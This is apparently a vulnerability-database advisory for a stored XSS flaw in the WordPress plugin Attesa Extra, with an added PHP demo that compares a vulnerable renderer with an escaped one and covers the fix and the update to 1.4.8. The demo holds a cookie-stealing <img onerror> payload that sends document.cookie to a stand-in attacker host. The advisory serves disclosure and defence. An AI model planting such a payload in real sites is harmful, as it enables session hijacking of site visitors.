VYPR
Medium severity · CVSS 6.5 · NVD Advisory · Published Oct 27, 2025 · Updated Apr 15, 2026

CVE-2025-62971

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CrestaProject Attesa Extra (attesa-extra) allows Stored XSS. This issue affects Attesa Extra: from n/a through 1.4.7.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

CVE-2025-62971 is a stored XSS in CrestaProject Attesa Extra ≤1.4.7 allowing injection of malicious scripts via improper input neutralization.

Vulnerability

Overview

CVE-2025-62971 is a stored cross-site scripting (XSS) vulnerability in the WordPress plugin Attesa Extra, developed by CrestaProject. The plugin fails to neutralize user-supplied input before writing it into generated pages, so an attacker with sufficient privileges can save arbitrary HTML and JavaScript that is persisted and later served, unescaped, to every user who loads the affected page.

Exploitation

Requirements

The attacker needs an authenticated account with enough privilege to save content through the plugin; the description does not name the minimum role, and the narrative's assumption of editor or administrator is not confirmed by the source. Because the XSS is stored, the attacker needs no further action once the payload is saved: it executes in the browser of any user, including anonymous visitors and higher-privileged administrators, who loads the affected page, whether by normal browsing or by following a link to it.
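As an added illustration, not code from Attesa Extra or CrestaProject, the following PHP models the pattern described in the overview and requirements above: a setting saved without neutralization, a vulnerable renderer that concatenates it into markup, and a hardened renderer that escapes for the HTML context. The option name, the CTA field, the payload and the helper names are assumptions; the advisory does not identify which field is affected.

```php
<?php
// Added example, not Attesa Extra's own code. Models a stored XSS in a plugin
// setting and the output-escaping fix. Option name, field and payload are
// assumed; the advisory does not say where the unneutralized input is rendered.

declare(strict_types=1);

// Constructed attacker input, as a user with plugin-edit rights might save it
// through a settings form or page-builder element. Breaks out of a quoted
// attribute and injects an element with an event handler.
const PAYLOAD = '"><img src=x onerror="document.location=\'https://attacker.invalid/?c=\'+document.cookie">';

// In-memory stand-in for WordPress get_option()/update_option().
$options = [];

function save_setting(array &$options, string $key, string $value): void
{
    // No neutralization on save: the raw string is persisted as-is.
    $options[$key] = $value;
}

// Vulnerable rendering (assumed): the stored value is concatenated into an
// attribute and into element text without escaping, so the payload runs on
// every page load.
function render_vulnerable(string $stored): string
{
    return '<a class="attesa-cta" title="' . $stored . '">' . $stored . '</a>';
}

// Hardened rendering: escape for the context the value lands in.
// htmlspecialchars(..., ENT_QUOTES) stands in for WordPress's esc_attr() and
// esc_html(); a real plugin should call those helpers at output time.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(string $stored): string
{
    return '<a class="attesa-cta" title="' . esc($stored) . '">' . esc($stored) . '</a>';
}

// Checks a rendered fragment the way a browser would see it: parse it and
// look for an injected scripting element or any on* event-handler attribute.
// Escaped text never becomes an element, so the hardened output passes.
function has_injected_markup(string $html): bool
{
    $doc = new DOMDocument();
    // Fragment input triggers libxml warnings; suppress them for the demo.
    @$doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>');
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (in_array($el->tagName, ['script', 'img', 'iframe', 'svg', 'object'], true)) {
            return true;
        }
        foreach ($el->attributes as $attr) {
            if (stripos($attr->name, 'on') === 0) {
                return true;
            }
        }
    }
    return false;
}

save_setting($options, 'attesa_extra_cta_title', PAYLOAD);

$vuln = render_vulnerable($options['attesa_extra_cta_title']);
$safe = render_hardened($options['attesa_extra_cta_title']);

echo 'vulnerable: ' . (has_injected_markup($vuln) ? 'payload executes' : 'inert') . PHP_EOL;
echo 'hardened:   ' . (has_injected_markup($safe) ? 'payload executes' : 'inert') . PHP_EOL;
echo $safe . PHP_EOL;
```

Run it with `php stored_xss_demo.php`; the vulnerable renderer reports an executable `<img onerror>` while the hardened one emits only entity-encoded text inside the intended `<a>`. Sanitizing on save (for example `sanitize_text_field()`) is useful defense in depth, but the fix for this class of bug is context-aware escaping at output: `esc_attr()` for attribute values, `esc_html()` for text, and `wp_kses_post()` where limited HTML must be allowed.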

Impact

The attacker can run arbitrary script in victims' browsers, which allows redirecting visitors to malicious sites, displaying unwanted content, or stealing session cookies. WordPress sets its authentication cookies HttpOnly by default, so cookie theft is usually blocked, but the injected script can still act inside an administrator's authenticated session (for example, issuing requests to wp-admin or the REST API with the victim's nonce), which is the more realistic path to site takeover. This compromises the integrity of the website and can affect all of its users.

Mitigation

Attesa Extra versions through 1.4.7 are affected. The vendor has released version 1.4.8, which fixes the issue, and users should update to 1.4.8 or later. If the update cannot be applied, contact the hosting provider or a web developer for assistance [1].

AI Insight generated on May 19, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products: 1

Patches: 0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References: 1

News mentions: 0

No linked articles in our index yet.